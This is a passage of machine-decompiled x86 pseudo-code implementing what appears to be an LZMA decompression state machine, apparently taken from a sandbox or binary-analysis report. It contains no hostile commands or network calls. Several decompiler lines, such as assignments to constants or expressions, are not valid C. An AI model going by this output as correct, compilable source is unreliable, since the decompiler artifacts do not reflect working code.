								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
